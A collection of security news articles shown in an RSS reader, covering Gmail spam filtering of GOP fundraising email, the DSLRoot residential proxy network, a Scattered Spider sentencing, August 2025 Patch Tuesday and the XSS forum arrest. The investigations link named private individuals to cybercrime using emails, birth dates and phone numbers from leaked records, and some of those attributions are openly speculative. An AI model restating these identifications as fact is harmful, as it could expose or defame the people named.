FreshRSS

🔒
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

GOP Cries Censorship Over Spam Filters That Work

The chairman of the Federal Trade Commission (FTC) last week sent a letter to Google’s CEO demanding to know why Gmail was blocking messages from Republican senders while allegedly failing to block similar missives supporting Democrats. The letter followed media reports accusing Gmail of disproportionately flagging messages from the GOP fundraising platform WinRed and sending them to the spam folder. But according to experts who track daily spam volumes worldwide, WinRed’s messages are getting blocked more because its methods of blasting email are increasingly way more spammy than that of ActBlue, the fundraising platform for Democrats.

Image: nypost.com

On Aug. 13, The New York Post ran an “exclusive” story titled, “Google caught flagging GOP fundraiser emails as ‘suspicious’ — sending them directly to spam.” The story cited a memo from Targeted Victory – whose clients include the National Republican Senatorial Committee (NRSC), Rep. Steve Scalise and Sen. Marsha Blackburn – which said it observed that the “serious and troubling” trend was still going on as recently as June and July of this year.

“If Gmail is allowed to quietly suppress WinRed links while giving ActBlue a free pass, it will continue to tilt the playing field in ways that voters never see, but campaigns will feel every single day,” the memo reportedly said.

In an August 28 letter to Google CEO Sundar Pichai, FTC Chairman Andrew Ferguson cited the New York Post story and warned that Gmail’s parent Alphabet may be engaging in unfair or deceptive practices.

“Alphabet’s alleged partisan treatment of comparable messages or messengers in Gmail to achieve political objectives may violate both of these prohibitions under the FTC Act,” Ferguson wrote. “And the partisan treatment may cause harm to consumers.”

However, the situation looks very different when you ask spam experts what’s going on with WinRed’s recent messaging campaigns. Atro Tossavainen and Pekka Jalonen are co-founders at Koli-Lõks OÜ, an email intelligence company in Estonia. Koli-Lõks taps into real-time intelligence about daily spam volumes by monitoring large numbers of “spamtraps” — email addresses that are intentionally set up to catch unsolicited emails.

Spamtraps are generally not used for communication or account creation, but instead are created to identify senders exhibiting spammy behavior, such as scraping the Internet for email addresses or buying unmanaged distribution lists. As an email sender, blasting these spamtraps over and over with unsolicited email is the fastest way to ruin your domain’s reputation online. Such activity also virtually ensures that more of your messages are going to start getting listed on spam blocklists that are broadly shared within the global anti-abuse community.

Tossavainen told KrebsOnSecurity that WinRed’s emails hit its spamtraps in the .com, .net, and .org space far more frequently than do fundraising emails sent by ActBlue. Koli-Lõks published a graph of the stark disparity in spamtrap activity for WinRed versus ActBlue, showing a nearly fourfold increase in spamtrap hits from WinRed emails in the final week of July 2025.

Image: Koliloks.eu

“Many of our spamtraps are in repurposed legacy-TLD domains (.com, .org, .net) and therefore could be understood to have been involved with a U.S. entity in their pre-zombie life,” Tossavainen explained in the LinkedIn post.

Raymond Dijkxhoorn is the CEO and a founding member of SURBL, a widely-used blocklist that flags domains and IP addresses known to be used in unsolicited messages, phishing and malware distribution. Dijkxhoorn said their spamtrap data mirrors that of Koli-Lõks, and shows that WinRed has consistently been far more aggressive in sending email than ActBlue.

Dijkxhoorn said the fact that WinRed’s emails so often end up dinging the organization’s sender reputation is not a content issue but rather a technical one.

“On our end we don’t really care if the content is political or trying to sell viagra or penis enlargements,” Dijkxhoorn said. “It’s the mechanics, they should not end up in spamtraps. And that’s the reason the domain reputation is tempered. Not ‘because domain reputation firms have a political agenda.’ We really don’t care about the political situation anywhere. The same as we don’t mind people buying penis enlargements. But when either of those land in spamtraps it will impact sending experience.”

The FTC letter to Google’s CEO also referenced a debunked 2022 study (PDF) by political consultants who found Google caught more Republican emails in spam filters. Techdirt editor Mike Masnick notes that while the 2022 study also found that other email providers caught more Democratic emails as spam, “Republicans laser-focused on Gmail because it fit their victimization narrative better.”

Masnick said GOP lawmakers then filed both lawsuits and complaints with the Federal Election Commission (both of which failed easily), claiming this was somehow an “in-kind contribution” to Democrats.

“This is political posturing designed to keep the White House happy by appearing to ‘do something’ about conservative claims of ‘censorship,'” Masnick wrote of the FTC letter. “The FTC has never policed ‘political bias’ in private companies’ editorial decisions, and for good reason—the First Amendment prohibits exactly this kind of government interference.”

WinRed did not respond to a request for comment.

The WinRed website says it is an online fundraising platform supported by a united front of the Trump campaign, the Republican National Committee (RNC), the NRSC, and the National Republican Congressional Committee (NRCC).

WinRed has recently come under fire for aggressive fundraising via text message as well. In June, 404 Media reported on a lawsuit filed by a family in Utah against the RNC for allegedly bombarding their mobile phones with text messages seeking donations after they’d tried to unsubscribe from the missives dozens of times.

One of the family members said they received 27 such messages from 25 numbers, even after sending 20 stop requests. The plaintiffs in that case allege the texts from WinRed and the RNC “knowingly disregard stop requests and purposefully use different phone numbers to make it impossible to block new messages.”

Dijkxhoorn said WinRed did inquire recently about why some of its assets had been marked as a risk by SURBL, but he said they appeared to have zero interest in investigating the likely causes he offered in reply.

“They only replied with, ‘You are interfering with U.S. elections,'” Dijkxhoorn said, noting that many of SURBL’s spamtrap domains are only publicly listed in the registration records for random domain names.

“They’re at best harvested by themselves but more likely [they] just went and bought lists,” he said. “It’s not like ‘Oh Google is filtering this and not the other,’ the reason isn’t the provider. The reason is the fundraising spammers and the lists they send to.”

No, Trump Can’t Legally Federalize US Elections

The United States Constitution is clear: President Donald Trump can’t take control of the country’s elections. But he can sow confusion and fear.

China Is About to Show Off Its New High-Tech Weapons to the World

On September 3, China will hold a “Victory Day” military parade in Tiananmen Square to celebrate the 80th anniversary of its victory over Japan—and to send the West a message.

DSLRoot, Proxies, and the Threat of ‘Legal Botnets’

The cybersecurity community on Reddit responded in disbelief this month when a self-described Air National Guard member with top secret security clearance began questioning the arrangement they’d made with company called DSLRoot, which was paying $250 a month to plug a pair of laptops into the Redditor’s high-speed Internet connection in the United States. This post examines the history and provenance of DSLRoot, one of the oldest “residential proxy” networks with origins in Russia and Eastern Europe.

The query about DSLRoot came from a Reddit user “Sacapoopie,” who did not respond to questions. This user has since deleted the original question from their post, although some of their replies to other Reddit cybersecurity enthusiasts remain in the thread. The original post was indexed here by archive.is, and it began with a question:

“I have been getting paid 250$ a month by a residential IP network provider named DSL root to host devices in my home,” Sacapoopie wrote. “They are on a separate network than what we use for personal use. They have dedicated DSL connections (one per host) to the ISP that provides the DSL coverage. My family used Starlink. Is this stupid for me to do? They just sit there and I get paid for it. The company pays the internet bill too.”

Many Redditors said they assumed Sacapoopie’s post was a joke, and that nobody with a cybersecurity background and top-secret (TS/SCI) clearance would agree to let some shady residential proxy company introduce hardware into their network. Other readers pointed to a slew of posts from Sacapoopie in the Cybersecurity subreddit over the past two years about their work on cybersecurity for the Air National Guard.

When pressed for more details by fellow Redditors, Sacapoopie described the equipment supplied by DSLRoot as “just two laptops hardwired into a modem, which then goes to a dsl port in the wall.”

“When I open the computer, it looks like [they] have some sort of custom application that runs and spawns several cmd prompts,” the Redditor explained. “All I can infer from what I see in them is they are making connections.”

When asked how they became acquainted with DSLRoot, Sacapoopie told another user they discovered the company and reached out after viewing an advertisement on a social media platform.

“This was probably 5-6 years ago,” Sacapoopie wrote. “Since then I just communicate with a technician from that company and I help trouble shoot connectivity issues when they arise.”

Reached for comment, DSLRoot said its brand has been unfairly maligned thanks to that Reddit discussion. The unsigned email said DSLRoot is fully transparent about its goals and operations, adding that it operates under full consent from its “regional agents,” the company’s term for U.S. residents like Sacapoopie.

“As although we support honest journalism, we’re against of all kinds of ‘low rank/misleading Yellow Journalism’ done for the sake of cheap hype,” DSLRoot wrote in reply. “It’s obvious to us that whoever is doing this, is either lacking a proper understanding of the subject or doing it intentionally to gain exposure by misleading those who lack proper understanding,” DSLRoot wrote in answer to questions about the company’s intentions.

“We monitor our clients and prohibit any illegal activity associated with our residential proxies,” DSLRoot continued. “We honestly didn’t know that the guy who made the Reddit post was a military guy. Be it an African-American granny trying to pay her rent or a white kid trying to get through college, as long as they can provide an Internet line or host phones for us — we’re good.”

WHAT IS DSLROOT?

DSLRoot is sold as a residential proxy service on the forum BlackHatWorld under the name DSLRoot and GlobalSolutions. The company is based in the Bahamas and was formed in 2012. The service is advertised to people who are not in the United States but who want to seem like they are. DSLRoot pays people in the United States to run the company’s hardware and software — including 5G mobile devices — and in return it rents those IP addresses as dedicated proxies to customers anywhere in the world — priced at $190 per month for unrestricted access to all locations.

The DSLRoot website.

The GlobalSolutions account on BlackHatWorld lists a Telegram account and a WhatsApp number in Mexico. DSLRoot’s profile on the marketing agency digitalpoint.com from 2010 shows their previous username on the forum was “Incorptoday.” GlobalSolutions user accounts at bitcointalk[.]org and roclub[.]com include the email clickdesk@instantvirtualcreditcards[.]com.

Passive DNS records from DomainTools.com show instantvirtualcreditcards[.]com shared a host back then — 208.85.1.164 — with just a handful of domains, including dslroot[.]com, regacard[.]com, 4groot[.]com, residential-ip[.]com, 4gemperor[.]com, ip-teleport[.]com, proxysource[.]net and proxyrental[.]net.

Cyber intelligence firm Intel 471 finds GlobalSolutions registered on BlackHatWorld in 2016 using the email address prepaidsolutions@yahoo.com. This user shared that their birthday is March 7, 1984.

Several negative reviews about DSLRoot on the forums noted that the service was operated by a BlackHatWorld user calling himself “USProxyKing.” Indeed, Intel 471 shows this user told fellow forum members in 2013 to contact him at the Skype username “dslroot.”

USProxyKing on BlackHatWorld, soliciting installations of his adware via torrents and file-sharing sites.

USProxyKing had a reputation for spamming the forums with ads for his residential proxy service, and he ran a “pay-per-install” program where he paid affiliates a small commission each time one of their websites resulted in the installation of his unspecified “adware” programs — presumably a program that turned host PCs into proxies. On the other end of the business, USProxyKing sold that pay-per-install access to others wishing to distribute questionable software — at $1 per installation.

Private messages indexed by Intel 471 show USProxyKing also raised money from nearly 20 different BlackHatWorld members who were promised shareholder positions in a new business that would offer robocalling services capable of placing 2,000 calls per minute.

Constella Intelligence, a platform that tracks data exposed in breaches, finds that same IP address GlobalSolutions used to register at BlackHatWorld was also used to create accounts at a handful of sites, including a GlobalSolutions user account at WebHostingTalk that supplied the email address incorptoday@gmail.com. Also registered to incorptoday@gmail.com are the domains dslbay[.]com, dslhub[.]net, localsim[.]com, rdslpro[.]com, virtualcards[.]biz/cc, and virtualvisa[.]cc.

Recall that DSLRoot’s profile on digitalpoint.com was previously named Incorptoday. DomainTools says incorptoday@gmail.com is associated with almost two dozen domains going back to 2008, including incorptoday[.]com, a website that offers to incorporate businesses in several states, including Delaware, Florida and Nevada, for prices ranging from $450 to $550.

As we can see in this archived copy of the site from 2013, IncorpToday also offered a premiere service for $750 that would allow the customer’s new company to have a retail checking account, with no questions asked.

Global Solutions is able to provide access to the U.S. banking system by offering customers prepaid cards that can be loaded with a variety of virtual payment instruments that were popular in Russian-speaking countries at the time, including WebMoney. The cards are limited to $500 balances, but non-Westerners can use them to anonymously pay for goods and services at a variety of Western companies. Cardnow[.]ru, another domain registered to incorptoday@gmail.com, demonstrates this in action.

A copy of Incorptoday’s website from 2013 offers non-US residents a service to incorporate a business in Florida, Delaware or Nevada, along with a no-questions-asked checking account, for $750.

WHO IS ANDREI HOLAS?

The oldest domain (2008) registered to incorptoday@gmail.com is andrei[.]me; another is called andreigolos[.]com. DomainTools says these and other domains registered to that email address include the registrant name Andrei Holas, from Huntsville, Ala.

Public records indicate Andrei Holas has lived with his brother — Aliaksandr Holas — at two different addresses in Alabama. Those records state that Andrei Holas’ birthday is in March 1984, and that his brother is slightly younger. The younger brother did not respond to a request for comment.

Andrei Holas maintained an account on the Russian social network Vkontakte under the email address ryzhik777@gmail.com, an address that shows up in numerous records hacked and leaked from Russian government entities over the past few years.

Those records indicate Andrei Holas and his brother are from Belarus and have maintained an address in Moscow for some time (that address is roughly three blocks away from the main headquarters of the Russian FSB, the successor intelligence agency to the KGB). Hacked Russian banking records show Andrei Holas’ birthday is March 7, 1984 — the same birth date listed by GlobalSolutions on BlackHatWorld.

A 2010 post by ryzhik777@gmail.com at the Russian-language forum Ulitka explains that the poster was having trouble getting his B1/B2 visa to visit his brother in the United States, even though he’d previously been approved for two separate guest visas and a student visa. It remains unclear if one, both, or neither of the Holas brothers still lives in the United States. Andrei explained in 2010 that his brother was an American citizen.

LEGAL BOTNETS

We can all wag our fingers at military personnel who should undoubtedly know better than to install Internet hardware from strangers, but in truth there is an endless supply of U.S. residents who will resell their Internet connection if it means they can make a few bucks out of it. And these days, there are plenty of residential proxy providers who will make it worth your while.

Traditionally, residential proxy networks have been constructed using malicious software that quietly turns infected systems into traffic relays that are then sold in shadowy online forums. Most often, this malware gets bundled with popular cracked software and video files that are uploaded to file-sharing networks and that secretly turn the host device into a traffic relay. In fact, USPRoxyKing bragged that he routinely achieved thousands of installs per week via this method alone.

There are a number of residential proxy networks that entice users to monetize their unused bandwidth (inviting you to violate the terms of service of your ISP in the process); others, like DSLRoot, act as a communal VPN, and by using the service you gain access to the connections of other proxies (users) by default, but you also agree to share your connection with others.

Indeed, Intel 471’s archives show the GlobalSolutions and DSLRoot accounts routinely received private messages from forum users who were college students or young people trying to make ends meet. Those messages show that many of DSLRoot’s “regional agents” often sought commissions to refer friends interested in reselling their home Internet connections (DSLRoot would offer to cover the monthly cost of the agent’s home Internet connection).

But in an era when North Korean hackers are relentlessly posing as Western IT workers by paying people to host laptop farms in the United States, letting strangers run laptops, mobile devices or any other hardware on your network seems like an awfully risky move regardless of your station in life. As several Redditors pointed out in Sacapoopie’s thread, an Arizona woman was sentenced in July 2025 to 102 months in prison for hosting a laptop farm that helped North Korean hackers secure jobs at more than 300 U.S. companies, including Fortune 500 firms.

Lloyd Davies is the founder of Infrawatch, a London-based security startup that tracks residential proxy networks. Davies said he reverse engineered the software that powers DSLRoot’s proxy service, and found it phones home to the aforementioned domain proxysource[.]net, which sells a service that promises to “get your ads live in multiple cities without getting banned, flagged or ghosted” (presumably a reference to CraigsList ads).

Davies said he found the DSLRoot installer had capabilities to remotely control residential networking equipment across multiple vendor brands.

Image: Infrawatch.app.

“The software employs vendor-specific exploits and hardcoded administrative credentials, suggesting DSLRoot pre-configures equipment before deployment,” Davies wrote in an analysis published today. He said the software performs WiFi network enumeration to identify nearby wireless networks, thereby “potentially expanding targeting capabilities beyond the primary internet connection.”

It’s unclear exactly when the USProxyKing was usurped from his throne, but DSLRoot and its proxy offerings are not what they used to be. Davies said the entire DSLRoot network now has fewer than 300 nodes nationwide, mostly systems on DSL providers like CenturyLink and Frontier.

On Aug. 17, GlobalSolutions posted to BlackHatWorld saying, “We’re restructuring our business model by downgrading to ‘DSL only’ lines (no mobile or cable).” Asked via email about the changes, DSLRoot blamed the decline in his customers on the proliferation of residential proxy services.

“These days it has become almost impossible to compete in this niche as everyone is selling residential proxies and many companies want you to install a piece of software on your phone or desktop so they can resell your residential IPs on a much larger scale,” DSLRoot explained. “So-called ‘legal botnets’ as we see them.”

SIM-Swapper, Scattered Spider Hacker Gets 10 Years

A 20-year-old Florida man at the center of a prolific cybercrime group known as “Scattered Spider” was sentenced to 10 years in federal prison today, and ordered to pay roughly $13 million in restitution to victims.

Noah Michael Urban of Palm Coast, Fla. pleaded guilty in April 2025 to charges of wire fraud and conspiracy. Florida prosecutors alleged Urban conspired with others to steal at least $800,000 from five victims via SIM-swapping attacks that diverted their mobile phone calls and text messages to devices controlled by Urban and his co-conspirators.

A booking photo of Noah Michael Urban released by the Volusia County Sheriff.

Although prosecutors had asked for Urban to serve eight years, Jacksonville news outlet News4Jax.com reports the federal judge in the case today opted to sentence Urban to 120 months in federal prison, ordering him to pay $13 million in restitution and undergo three years of supervised release after his sentence is completed.

In November 2024 Urban was charged by federal prosecutors in Los Angeles as one of five members of Scattered Spider (a.k.a. “Oktapus,” “Scatter Swine” and “UNC3944”), which specialized in SMS and voice phishing attacks that tricked employees at victim companies into entering their credentials and one-time passcodes at phishing websites. Urban pleaded guilty to one count of conspiracy to commit wire fraud in the California case, and the $13 million in restitution is intended to cover victims from both cases.

The targeted SMS scams spanned several months during the summer of 2022, asking employees to click a link and log in at a website that mimicked their employer’s Okta authentication page. Some SMS phishing messages told employees their VPN credentials were expiring and needed to be changed; other missives advised employees about changes to their upcoming work schedule.

That phishing spree netted Urban and others access to more than 130 companies, including Twilio, LastPass, DoorDash, MailChimp, and Plex. The government says the group used that access to steal proprietary company data and customer information, and that members also phished people to steal millions of dollars worth of cryptocurrency.

For many years, Urban’s online hacker aliases “King Bob” and “Sosa” were fixtures of the Com, a mostly Telegram and Discord-based community of English-speaking cybercriminals wherein hackers boast loudly about high-profile exploits and hacks that almost invariably begin with social engineering. King Bob constantly bragged on the Com about stealing unreleased rap music recordings from popular artists, presumably through SIM-swapping attacks. Many of those purloined tracks or “grails” he later sold or gave away on forums.

Noah “King Bob” Urban, posting to Twitter/X around the time of his sentencing today.

Sosa also was active in a particularly destructive group of accomplished criminal SIM-swappers known as “Star Fraud.” Cyberscoop’s AJ Vicens reported in 2023 that individuals within Star Fraud were likely involved in the high-profile Caesars Entertainment and MGM Resorts extortion attacks that same year.

The Star Fraud SIM-swapping group gained the ability to temporarily move targeted mobile numbers to devices they controlled by constantly phishing employees of the major mobile providers. In February 2023, KrebsOnSecurity published data taken from the Telegram channels for Star Fraud and two other SIM-swapping groups showing these crooks focused on SIM-swapping T-Mobile customers, and that they collectively claimed internal access to T-Mobile on 100 separate occasions over a 7-month period in 2022.

Reached via one of his King Bob accounts on Twitter/X, Urban called the sentence unjust, and said the judge in his case discounted his age as a factor.

“The judge purposefully ignored my age as a factor because of the fact another Scattered Spider member hacked him personally during the course of my case,” Urban said in reply to questions, noting that he was sending the messages from a Florida county jail. “He should have been removed as a judge much earlier on. But staying in county jail is torture.”

A court transcript (PDF) from a status hearing in February 2025 shows Urban was telling the truth about the hacking incident that happened while he was in federal custody. It involved an intrusion into a magistrate judge’s email account, where a copy of Urban’s sealed indictment was stolen. The judge told attorneys for both sides that a co-defendant in the California case was trying to find out about Mr. Urban’s activity in the Florida case.

“What it ultimately turned into a was a big faux pas,” Judge Harvey E. Schlesinger said. “The Court’s password…business is handled by an outside contractor. And somebody called the outside contractor representing Judge Toomey saying, ‘I need a password change.’ And they gave out the password change. That’s how whoever was making the phone call got into the court.”

Microsoft Patch Tuesday, August 2025 Edition

Microsoft today released updates to fix more than 100 security flaws in its Windows operating systems and other software. At least 13 of the bugs received Microsoft’s most-dire “critical” rating, meaning they could be abused by malware or malcontents to gain remote access to a Windows system with little or no help from users.

August’s patch batch from Redmond includes an update for CVE-2025-53786, a vulnerability that allows an attacker to pivot from a compromised Microsoft Exchange Server directly into an organization’s cloud environment, potentially gaining control over Exchange Online and other connected Microsoft Office 365 services. Microsoft first warned about this bug on Aug. 6, saying it affects Exchange Server 2016 and Exchange Server 2019, as well as its flagship Exchange Server Subscription Edition.

Ben McCarthy, lead cyber security engineer at Immersive, said a rough search reveals approximately 29,000 Exchange servers publicly facing on the internet that are vulnerable to this issue, with many of them likely to have even older vulnerabilities.

McCarthy said the fix for CVE-2025-53786 requires more than just installing a patch, such as following Microsoft’s manual instructions for creating a dedicated service to oversee and lock down the hybrid connection.

“In effect, this vulnerability turns a significant on-premise Exchange breach into a full-blown, difficult-to-detect cloud compromise with effectively living off the land techniques which are always harder to detect for defensive teams,” McCarthy said.

CVE-2025-53779 is a weakness in the Windows Kerberos authentication system that allows an unauthenticated attacker to gain domain administrator privileges. Microsoft credits the discovery of the flaw to Akamai researcher Yuval Gordon, who dubbed it “BadSuccessor” in a May 2025 blog post. The attack exploits a weakness in “delegated Managed Service Account” or dMSA — a feature that was introduced in Windows Server 2025.

Some of the critical flaws addressed this month with the highest severity (between 9.0 and 9.9 CVSS scores) include a remote code execution bug in the Windows GDI+ component that handles graphics rendering (CVE-2025-53766) and CVE-2025-50165, another graphics rendering weakness. Another critical patch involves CVE-2025-53733, a vulnerability in Microsoft Word that can be exploited without user interaction and triggered through the Preview Pane.

One final critical bug tackled this month deserves attention: CVE-2025-53778, a bug in Windows NTLM, a core function of how Windows systems handle network authentication. According to Microsoft, the flaw could allow an attacker with low-level network access and basic user privileges to exploit NTLM and elevate to SYSTEM-level access — the highest level of privilege in Windows. Microsoft rates the exploitation of this bug as “more likely,” although there is no evidence the vulnerability is being exploited at the moment.

Feel free to holler in the comments if you experience problems installing any of these updates. As ever, the SANS Internet Storm Center has its useful breakdown of the Microsoft patches indexed by severity and CVSS score, and AskWoody.com is keeping an eye out for Windows patches that may cause problems for enterprises and end users.

GOOD MIGRATIONS

Windows 10 users out there likely have noticed by now that Microsoft really wants you to upgrade to Windows 11. The reason is that after the Patch Tuesday on October 14, 2025, Microsoft will stop shipping free security updates for Windows 10 computers. The trouble is, many PCs running Windows 10 do not meet the hardware specifications required to install Windows 11 (or they do, but just barely).

If the experience with Windows XP is any indicator, many of these older computers will wind up in landfills or else will be left running in an unpatched state. But if your Windows 10 PC doesn’t have the hardware chops to run Windows 11 and you’d still like to get some use out of it safely, consider installing a newbie-friendly version of Linux, like Linux Mint.

Like most modern Linux versions, Mint will run on anything with a 64-bit CPU that has at least 2GB of memory, although 4GB is recommended. In other words, it will run on almost any computer produced in the last decade.

There are many versions of Linux available, but Linux Mint is likely to be the most intuitive interface for regular Windows users, and it is largely configurable without any fuss at the text-only command-line prompt. Mint and other flavors of Linux come with LibreOffice, which is an open source suite of tools that includes applications similar to Microsoft Office, and it can open, edit and save documents as Microsoft Office files.

If you’d prefer to give Linux a test drive before installing it on a Windows PC, you can always just download it to a removable USB drive. From there, reboot the computer (with the removable drive plugged in) and select the option at startup to run the operating system from the external USB drive. If you don’t see an option for that after restarting, try restarting again and hitting the F8 button, which should open a list of bootable drives. Here’s a fairly thorough tutorial that walks through exactly how to do all this.

And if this is your first time trying out Linux, relax and have fun: The nice thing about a “live” version of Linux (as it’s called when the operating system is run from a removable drive such as a CD or a USB stick) is that none of your changes persist after a reboot. Even if you somehow manage to break something, a restart will return the system back to its original state.

Who Got Arrested in the Raid on the XSS Crime Forum?

On July 22, 2025, the European police agency Europol said a long-running investigation led by the French Police resulted in the arrest of a 38-year-old administrator of XSS, a Russian-language cybercrime forum with more than 50,000 members. The action has triggered an ongoing frenzy of speculation and panic among XSS denizens about the identity of the unnamed suspect, but the consensus is that he is a pivotal figure in the crime forum scene who goes by the hacker handle “Toha.” Here’s a deep dive on what’s knowable about Toha, and a short stab at who got nabbed.

An unnamed 38-year-old man was arrested in Kiev last month on suspicion of administering the cybercrime forum XSS. Image: ssu.gov.ua.

Europol did not name the accused, but published partially obscured photos of him from the raid on his residence in Kiev. The police agency said the suspect acted as a trusted third party — arbitrating disputes between criminals — and guaranteeing the security of transactions on XSS. A statement from Ukraine’s SBU security service said XSS counted among its members many cybercriminals from various ransomware groups, including REvil, LockBit, Conti, and Qiliin.

Since the Europol announcement, the XSS forum resurfaced at a new address on the deep web (reachable only via the anonymity network Tor). But from reviewing the recent posts, there appears to be little consensus among longtime members about the identity of the now-detained XSS administrator.

The most frequent comment regarding the arrest was a message of solidarity and support for Toha, the handle chosen by the longtime administrator of XSS and several other major Russian forums. Toha’s accounts on other forums have been silent since the raid.

Europol said the suspect has enjoyed a nearly 20-year career in cybercrime, which roughly lines up with Toha’s history. In 2005, Toha was a founding member of the Russian-speaking forum Hack-All. That is, until it got massively hacked a few months after its debut. In 2006, Toha rebranded the forum to exploit[.]in, which would go on to draw tens of thousands of members, including an eventual Who’s-Who of wanted cybercriminals.

Toha announced in 2018 that he was selling the Exploit forum, prompting rampant speculation on the forums that the buyer was secretly a Russian or Ukrainian government entity or front person. However, those suspicions were unsupported by evidence, and Toha vehemently denied the forum had been given over to authorities.

One of the oldest Russian-language cybercrime forums was DaMaGeLaB, which operated from 2004 to 2017, when its administrator “Ar3s” was arrested. In 2018, a partial backup of the DaMaGeLaB forum was reincarnated as xss[.]is, with Toha as its stated administrator.

CROSS-SITE GRIFTING

Clues about Toha’s early presence on the Internet — from ~2004 to 2010 — are available in the archives of Intel 471, a cyber intelligence firm that tracks forum activity. Intel 471 shows Toha used the same email address across multiple forum accounts, including at Exploit, Antichat, Carder[.]su and inattack[.]ru.

DomainTools.com finds Toha’s email address — toschka2003@yandex.ru — was used to register at least a dozen domain names — most of them from the mid- to late 2000s. Apart from exploit[.]in and a domain called ixyq[.]com, the other domains registered to that email address end in .ua, the top-level domain for Ukraine (e.g. deleted.org[.]ua, lj.com[.]ua, and blogspot.org[.]ua).

A 2008 snapshot of a domain registered to toschka2003@yandex.ru and to Anton Medvedovsky in Kiev. Note the message at the bottom left, “Protected by Exploit,in.” Image: archive.org.

Nearly all of the domains registered to toschka2003@yandex.ru contain the name Anton Medvedovskiy in the registration records, except for the aforementioned ixyq[.]com, which is registered to the name Yuriy Avdeev in Moscow.

This Avdeev surname came up in a lengthy conversation with Lockbitsupp, the leader of the rapacious and destructive ransomware affiliate group Lockbit. The conversation took place in February 2024, when Lockbitsupp asked for help identifying Toha’s real-life identity.

In early 2024, the leader of the Lockbit ransomware group — Lockbitsupp — asked for help investigating the identity of the XSS administrator Toha, which he claimed was a Russian man named Anton Avdeev.

Lockbitsupp didn’t share why he wanted Toha’s details, but he maintained that Toha’s real name was Anton Avdeev. I declined to help Lockbitsupp in whatever revenge he was planning on Toha, but his question made me curious to look deeper.

It appears Lockbitsupp’s query was based on a now-deleted Twitter post from 2022, when a user by the name “3xp0rt” asserted that Toha was a Russian man named Anton Viktorovich Avdeev, born October 27, 1983.

Searching the web for Toha’s email address toschka2003@yandex.ru reveals a 2010 sales thread on the forum bmwclub.ru where a user named Honeypo was selling a 2007 BMW X5. The ad listed the contact person as Anton Avdeev and gave the contact phone number 9588693.

A search on the phone number 9588693 in the breach tracking service Constella Intelligence finds plenty of official Russian government records with this number, date of birth and the name Anton Viktorovich Avdeev. For example, hacked Russian government records show this person has a Russian tax ID and SIN (Social Security number), and that they were flagged for traffic violations on several occasions by Moscow police; in 2004, 2006, 2009, and 2014.

Astute readers may have noticed by now that the ages of Mr. Avdeev (41) and the XSS admin arrested this month (38) are a bit off. This would seem to suggest that the person arrested is someone other than Mr. Avdeev, who did not respond to requests for comment.

A FLY ON THE WALL

For further insight on this question, KrebsOnSecurity sought comments from Sergeii Vovnenko, a former cybercriminal from Ukraine who now works at the security startup paranoidlab.com. I reached out to Vovnenko because for several years beginning around 2010 he was the owner and operator of thesecure[.]biz, an encrypted “Jabber” instant messaging server that Europol said was operated by the suspect arrested in Kiev. Thesecure[.]biz grew quite popular among many of the top Russian-speaking cybercriminals because it scrupulously kept few records of its users’ activity, and its administrator was always a trusted member of the community.

The reason I know this historic tidbit is that in 2013, Vovnenko — using the hacker nicknames “Fly,” and “Flycracker” — hatched a plan to have a gram of heroin purchased off of the Silk Road darknet market and shipped to our home in Northern Virginia. The scheme was to spoof a call from one of our neighbors to the local police, saying this guy Krebs down the street was a druggie who was having narcotics delivered to his home.

I happened to be lurking on Flycracker’s private cybercrime forum when his heroin-framing plan was carried out, and called the police myself before the smack eventually arrived in the U.S. Mail. Vovnenko was later arrested for unrelated cybercrime activities, extradited to the United States, convicted, and deported after a 16-month stay in the U.S. prison system [on several occasions, he has expressed heartfelt apologies for the incident, and we have since buried the hatchet].

Vovnenko said he purchased a device for cloning credit cards from Toha in 2009, and that Toha shipped the item from Russia. Vovnenko explained that he (Flycracker) was the owner and operator of thesecure[.]biz from 2010 until his arrest in 2014.

Vovnenko believes thesecure[.]biz was stolen while he was in jail, either by Toha and/or an XSS administrator who went by the nicknames N0klos and Sonic.

“When I was in jail, [the] admin of xss.is stole that domain, or probably N0klos bought XSS from Toha or vice versa,” Vovnenko said of the Jabber domain. “Nobody from [the forums] spoke with me after my jailtime, so I can only guess what really happened.”

N0klos was the owner and administrator of an early Russian-language cybercrime forum known as Darklife[.]ws. However, N0kl0s also appears to be a lifelong Russian resident, and in any case seems to have vanished from Russian cybercrime forums several years ago.

Asked whether he believes Toha was the XSS administrator who was arrested this month in Ukraine, Vovnenko maintained that Toha is Russian, and that “the French cops took the wrong guy.”

WHO IS TOHA?

So who did the Ukrainian police arrest in response to the investigation by the French authorities? It seems plausible that the BMW ad invoking Toha’s email address and the name and phone number of a Russian citizen was simply misdirection on Toha’s part — intended to confuse and throw off investigators. Perhaps this even explains the Avdeev surname surfacing in the registration records from one of Toha’s domains.

But sometimes the simplest answer is the correct one. “Toha” is a common Slavic nickname for someone with the first name “Anton,” and that matches the name in the registration records for more than a dozen domains tied to Toha’s toschka2003@yandex.ru email address: Anton Medvedovskiy.

Constella Intelligence finds there is an Anton Gannadievich Medvedovskiy living in Kiev who will be 38 years old in December. This individual owns the email address itsmail@i.ua, as well an an Airbnb account featuring a profile photo of a man with roughly the same hairline as the suspect in the blurred photos released by the Ukrainian police. Mr. Medvedovskiy did not respond to a request for comment.

My take on the takedown is that the Ukrainian authorities likely arrested Medvedovskiy. Toha shared on DaMaGeLab in 2005 that he had recently finished the 11th grade and was studying at a university — a time when Mevedovskiy would have been around 18 years old. On Dec. 11, 2006, fellow Exploit members wished Toha a happy birthday. Records exposed in a 2022 hack at the Ukrainian public services portal diia.gov.ua show that Mr. Medvedovskiy’s birthday is Dec. 11, 1987.

The law enforcement action and resulting confusion about the identity of the detained has thrown the Russian cybercrime forum scene into disarray in recent weeks, with lengthy and heated arguments about XSS’s future spooling out across the forums.

XSS relaunched on a new Tor address shortly after the authorities plastered their seizure notice on the forum’s  homepage, but all of the trusted moderators from the old forum were dismissed without explanation. Existing members saw their forum account balances drop to zero, and were asked to plunk down a deposit to register at the new forum. The new XSS “admin” said they were in contact with the previous owners and that the changes were to help rebuild security and trust within the community.

However, the new admin’s assurances appear to have done little to assuage the worst fears of the forum’s erstwhile members, most of whom seem to be keeping their distance from the relaunched site for now.

Indeed, if there is one common understanding amid all of these discussions about the seizure of XSS, it is that Ukrainian and French authorities now have several years worth of private messages between XSS forum users, as well as contact rosters and other user data linked to the seized Jabber server.

“The myth of the ‘trusted person’ is shattered,” the user “GordonBellford” cautioned on Aug. 3 in an Exploit forum thread about the XSS admin arrest. “The forum is run by strangers. They got everything. Two years of Jabber server logs. Full backup and forum database.”

GordonBellford continued:

